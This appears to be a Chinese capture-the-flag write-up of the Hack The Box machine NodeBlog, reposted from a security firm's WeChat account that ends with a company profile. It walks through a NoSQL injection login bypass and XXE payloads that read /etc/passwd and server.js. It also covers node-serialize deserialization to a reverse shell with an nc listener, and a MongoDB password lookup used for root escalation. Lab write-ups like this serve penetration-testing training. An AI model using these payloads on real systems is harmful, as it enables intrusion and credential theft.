0x01 靶场描述
Hack the box 是国外的一个靶机平台,里面的靶机包含多种系统类型,并且里面可以利用的漏洞类型多种多样,有很多靶机其实非常贴近实战情景。因此 HTB 是一个很好的学习渗透测试靶场,官网:https://www.hackthebox.eu/invite。NodeBlog特性如图:
0x02 靶场复现
知识点: 端口/漏洞扫描、Nosql注入、XXE注入、nodejs反序列化、mongodb查找信息提权
一、端口/漏洞扫描、Nosql注入、XXE注入、nodejs反序列化
1.使用nmap扫描,发现该目标开启了22、5000端口
nmap -A -sS -sC -sV 10.10.11.139 #-A强力扫描 -sS SYN扫描 -sV识别服务版本 -sC调用脚本扫描
2.访问5000端口,是nodejs web,到登录栏,使用Nosql抓包改包进行注入,成功登录。
Nosql注入技巧:https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection#authentication-bypass
POST /login HTTP/1.1Host: 10.10.11.139:5000User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/jsonContent-Length: 55Origin: http://10.10.11.139:5000Connection: closeReferer: http://10.10.11.139:5000/loginUpgrade-Insecure-Requests: 1{"user": "admin", "password": {"$ne": "wrongpassword"}}
3.发现upload栏可以上传xml文件,尝试xxe读取/etc/passwd文件成功
<!ENTITY file SYSTEM "file:///etc/passwd">]><post><title>aaa Post</title><description>Example Description</description><markdown>&file;</markdown></post>
4.通过articles报错,获取到nodejs的路径/opt/blog/
POST /articles HTTP/1.1Host: 10.10.11.139:5000User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeReferer: http://10.10.11.139:5000/loginCookie: auth=%7B%22user%22%3A%22admin%22%2C%22sign%22%3A%2223e112072945418601deb47d9a6c7de8%22%7DUpgrade-Insecure-Requests: 1If-None-Match: W/"4d2-PIHYOQiJDvwvmRzEyZm9VvLBz/Y"Content-Type: application/x-www-form-urlencodedContent-Length: 0
5.尝试使用之前的xxe漏洞读取nodejs的server.js配置文件
1.xxe语句:<!ENTITY file SYSTEM "file:///opt/blog/server.js">]><post><title>aaa Post</title><description>Example Description</description><markdown>&file;</markdown></post>2.读取到的js内容const express = require('express')const mongoose = require('mongoose')const Article = require('./models/article')const articleRouter = require('./routes/articles')const loginRouter = require('./routes/login')const serialize = require('node-serialize')const methodOverride = require('method-override')const fileUpload = require('express-fileupload')const cookieParser = require('cookie-parser');const crypto = require('crypto')const cookie_secret = "UHC-SecretCookie"//var session = require('express-session');const app = express()mongoose.connect('mongodb://localhost/blog')app.set('view engine', 'ejs')app.use(express.urlencoded({ extended: false }))app.use(methodOverride('_method'))app.use(fileUpload())app.use(express.json());app.use(cookieParser());//app.use(session({secret: "UHC-SecretKey-123"}));function authenticated(c) {if (typeof c == 'undefined')return falsec = serialize.unserialize(c)if (c.sign == (crypto.createHash('md5').update(cookie_secret + c.user).digest('hex')) ){return true} else {return false}}app.get('/', async (req, res) => {const articles = await Article.find().sort({createdAt: 'desc'})res.render('articles/index', { articles: articles, ip: req.socket.remoteAddress, authenticated: authenticated(req.cookies.auth) })})app.use('/articles', articleRouter)app.use('/login', loginRouter)app.listen(5000)
6.简单审计,发现js代码中存在和node.js反序列化漏洞类似的漏洞,漏洞文章:
https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/
function authenticated(c) {//经过身份验证if (typeof c == 'undefined')return falsec = serialize.unserialize(c)//进行反序列化if (c.sign == (crypto.createHash('md5').update(cookie_secret + c.user).digest('hex')) ){return true//cookie是由'UHC-SecretCookie'+'admin'组成再转换成md5格式的} else {return false}}
7.即可使用exp,在登录进去的状态,进行抓包cookie反序列化反弹shell
1.反弹shell包,EXP在cookie中,根据自己的实际的监听地址和端口进行更改:POST /articles HTTP/1.1Host: 10.10.11.139:5000User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeReferer: http://10.10.11.139:5000/loginCookie: auth=%7B%22user%22%3A%22admin%22%2C%22sign%22%3A%2223e112072945418601deb47d9a6c7de8%22%7DUpgrade-Insecure-Requests: 1If-None-Match: W/"4d2-PIHYOQiJDvwvmRzEyZm9VvLBz/Y"Content-Type: application/x-www-form-urlencodedContent-Length: 02.nc监听nc -lvnp 77773.查看user的flagcd /home/adminchmod +x admincat ~/user.txt
二、mongodb查找信息提权
1.查找到服务器存在mongodb
ps auxww
2.使用mongodb查找admin账户的密码,IppsecSaysPleaseSubscribe
mongoshow dbsuse blogshow tablesdb.users.find()
3.sudo -l发现其权限可直接登录root,通过密码登录获取root权限
1.切换到adminsu admin2.使用python做一个交互式的shellpython3 -c 'import pty; pty.spawn("/bin/bash")'3.切换到rootsudo su root4.查看root.txtcat ~/root.txt
(注:要在正规授权情况下测试网站:日站不规范,亲人泪两行)
0x03 公司简介
江西渝融云安全科技有限公司,2017年发展至今,已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司,是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。
公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证,拥有软件著作权十八项;荣获2020年全国工控安全深度行安全攻防对抗赛三等奖;庆祝建党100周年活动信息安全应急保障优秀案例等荣誉......
编制:sm
审核:fjh
审核:Dog
原文始发于微信公众号(融云攻防实验室):Hack The Box-NodeBlog
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论